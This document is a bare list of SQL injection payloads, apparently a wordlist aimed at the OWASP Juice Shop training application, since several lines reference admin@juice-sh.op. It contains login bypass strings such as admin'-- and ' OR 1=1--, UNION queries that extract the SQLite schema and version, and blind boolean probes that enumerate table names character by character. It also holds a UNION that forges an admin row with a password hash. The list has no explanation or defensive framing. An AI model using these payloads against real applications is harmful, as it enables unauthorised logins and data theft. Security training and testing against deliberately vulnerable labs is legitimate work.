' OR '1'='1
' OR 1=1--
' OR 1=1#
' OR 1=1/*
') OR '1'='1--
') OR ('1'='1--
' OR 1=1 LIMIT 1--
' OR 1=1 ORDER BY 1--
' OR 1=1 UNION SELECT null--
' UNION SELECT sqlite_version()--
' UNION SELECT name FROM sqlite_master WHERE type='table'--
' UNION SELECT sql FROM sqlite_master--
' OR ''='
' OR 1--
' OR 1#
' OR 1/*
') OR ('1
') OR 1=1#
admin'--
admin'/*
admin' OR '1'='1
admin' OR '1'='1'--
admin' OR '1'='1'#
admin' OR '1'='1'/*
admin'OR 1=1 OR ''='
admin' OR 1=1
admin' OR 1=1--
admin' OR 1=1#
admin' OR 1=1/*
admin') OR ('1'='1
admin') OR ('1'='1'--
admin') OR ('1'='1'#
admin') OR ('1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
' AND (SELECT COUNT(*) FROM sqlite_master)>0--
' AND (SELECT name FROM sqlite_master WHERE type='table' LIMIT 1)='Users'--
' OR (SELECT COUNT(*) FROM sqlite_master WHERE type='table' AND name='Users')=1--
' OR (SELECT name FROM sqlite_master WHERE type='table' LIMIT 1)!='x'--
' OR EXISTS(SELECT * FROM sqlite_master WHERE type='table' AND name='Users')--
' OR (SELECT SUBSTR(name,1,1) FROM sqlite_master WHERE type='table' LIMIT 1)='U'--
' OR (SELECT SUBSTR(sql,1,6) FROM sqlite_master WHERE type='table' AND name='Users')='CREATE'--
' OR (SELECT COUNT(*) FROM Users)>0--
' OR (SELECT COUNT(*) FROM Users WHERE email LIKE '%admin%')>0--
' OR email='admin@juice-sh.op'--
' OR email LIKE '%admin%'--
test@test.com'--
test@test.com' OR '1'='1
test@test.com' OR 1=1--
test@test.com') OR ('1'='1
' OR rowid=1--
' OR oid=1--
' OR _rowid_=1--
